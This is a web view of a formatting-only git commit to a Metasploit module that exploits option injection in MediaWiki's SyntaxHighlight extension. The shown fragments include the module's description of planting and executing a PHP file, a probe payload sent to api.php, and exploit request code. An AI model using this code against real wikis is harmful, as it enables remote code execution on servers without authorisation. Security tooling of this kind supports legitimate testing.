Fixed formatting
Yorick Koster
GitHub
parent
1569d2cf8e
commit
f9e7715adb
|
|
@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'MediaWiki SyntaxHighlight extension option injection vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an option injection vulnerability in the SyntaxHighlight
|
||||
This module exploits an option injection vulnerability in the SyntaxHighlight
|
||||
extension of MediaWiki. It tries to create & execute a PHP file in the document root.
|
||||
The USERNAME & PASSWORD options are only needed if the Wiki is configured as private.
|
||||
},
|
||||
|
|
@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
OptBool.new('CLEANUP', [ false, "Delete created PHP file?", true ])
|
||||
])
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
|
|
@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'text' => '<syntaxhighlight lang="java" start="0,full=1"></syntaxhighlight>'
|
||||
}
|
||||
})
|
||||
|
||||
|
||||
if(res && res.headers.key?('MediaWiki-API-Error'))
|
||||
if(res.headers['MediaWiki-API-Error'] == 'internal_api_error_MWException')
|
||||
return Exploit::CheckCode::Appears
|
||||
|
|
@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
# use deprecated interface
|
||||
def login
|
||||
print_status("Trying to login....")
|
||||
|
|
@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
if datastore['USERNAME'] && datastore['USERNAME'].length > 0
|
||||
login
|
||||
end
|
||||
|
||||
|
||||
check_code = check
|
||||
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
|
||||
fail_with(Failure::NoTarget, "#{peer}")
|
||||
|
|
@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
cleanup = ""
|
||||
end
|
||||
print_status("Local PHP file: #{cssfile}")
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'api.php'),
|
||||
|
|
@ -154,4 +154,4 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
send_request_cgi({'uri' => normalize_uri(target_uri.path, cssfile)})
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue